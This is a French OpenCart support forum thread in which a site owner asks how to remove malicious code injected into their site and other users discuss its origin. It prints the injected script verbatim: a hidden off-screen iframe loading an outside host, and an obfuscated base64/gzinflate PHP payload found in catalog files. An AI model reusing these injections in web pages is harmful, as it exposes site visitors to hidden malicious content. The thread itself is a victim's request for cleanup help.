Nous ne répondons seulement qu'aux sujets dont l'auteur a complété sa signature [Lire]


Enlever un code malicieux

Soutien général pour les problèmes techniques avec OpenCart

Enlever un code malicieux

Messagepar MadEd » 28 Juin 2012, 22:58

Bonjour,

Un code malicieux s'est inséré sur mon site avant la balise head.

Il s'agit du code suivant :

Code: Tout sélectionner
<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script><script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script><script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>


Ou ai-je de plus grande chance de trouver ce code ?

Mes fichiers .htaccess étaient aussi modifiés, je les ait nettoyé.
Dernière édition par MadEd le 13 Juil 2012, 16:31, édité 1 fois.
Open Cart 1.5.1 Build FR / Hebergeur : Hosteur
Avatar de l’utilisateur
MadEd
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 10
Inscription: 08 Nov 2011, 17:00

Re: Enlever un code malicieux

Messagepar MadEd » 28 Juin 2012, 23:05

Trouvé, dans les fichiers *.php du répertoire "catalog", planqué en base64

Code: Tout sélectionner
#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#
Open Cart 1.5.1 Build FR / Hebergeur : Hosteur
Avatar de l’utilisateur
MadEd
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 10
Inscription: 08 Nov 2011, 17:00

Re: Enlever un code malicieux

Messagepar LeorLindel » 28 Juin 2012, 23:12

Ce code n'a pas du s'insérer tout seul, aurais-tu installé un module ou un template ?
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4228
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Enlever un code malicieux

Messagepar MadEd » 29 Juin 2012, 02:08

J'ai testé un module de forum de opencart2004.com, dispo sur le site offciel. Rien d'autre sinon.

Celà peut venir de l'hébergeur aussi ? Car ce code était dans mes autres sites (non-opencart) hébergé sur des comptes différents...
Open Cart 1.5.1 Build FR / Hebergeur : Hosteur
Avatar de l’utilisateur
MadEd
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 10
Inscription: 08 Nov 2011, 17:00

Re: Enlever un code malicieux

Messagepar oiapoque » 02 Juil 2012, 16:51

bonjour,
j'ai rencontré le meme probleme sur différents de mes sites hebergés sur un meme compte
chez quel hébergeur etes-vous?
avez-vous trouvé l'origine du probleme?

cordialement,
oiapoque
oiapoque
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 1
Inscription: 02 Juil 2012, 16:49

Re: Enlever un code malicieux

Messagepar LeorLindel » 02 Juil 2012, 23:02

Je pense qu'il faut te diriger vers ton hébergeur et non vers nous !

PS : Pourras-tu compléter ta signature. Merci
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4228
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce

Re: Enlever un code malicieux

Messagepar MadEd » 13 Juil 2012, 16:32

oiapoque a écrit:bonjour,
j'ai rencontré le meme probleme sur différents de mes sites hebergés sur un meme compte
chez quel hébergeur etes-vous?
avez-vous trouvé l'origine du probleme?

cordialement,
oiapoque


Je suis chez hosteur
Open Cart 1.5.1 Build FR / Hebergeur : Hosteur
Avatar de l’utilisateur
MadEd
Utilisateur enregistré
Utilisateur enregistré
 
Messages: 10
Inscription: 08 Nov 2011, 17:00

Re: [Résolu]Enlever un code malicieux

Messagepar LeorLindel » 13 Juil 2012, 23:02

Même réponse que le sujet précédent.
Image
1 - A lire avant de poster un sujet
2 - Politique sur la signature.

Quand le sujet est résolu, pensez à ajouter la petite coche verte Image dans le titre initial en éditant votre premier message et non dans votre dernière réponse.
Merci


Toutes les extensions commerciales (templates ou modules payants) ne peuvent pas faire l'objet d'ouverture de sujet, prière de bien vouloir s'adresser au concepteur en cas de problème ou demande de renseignements.

Seul, on avance plus vite, à plusieurs on avance plus loin.
Avatar de l’utilisateur
LeorLindel
Administrateur
Administrateur
 
Messages: 4228
Inscription: 19 Fév 2010, 13:44
Localisation: Lutéce


Retourner vers Soutien Général

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité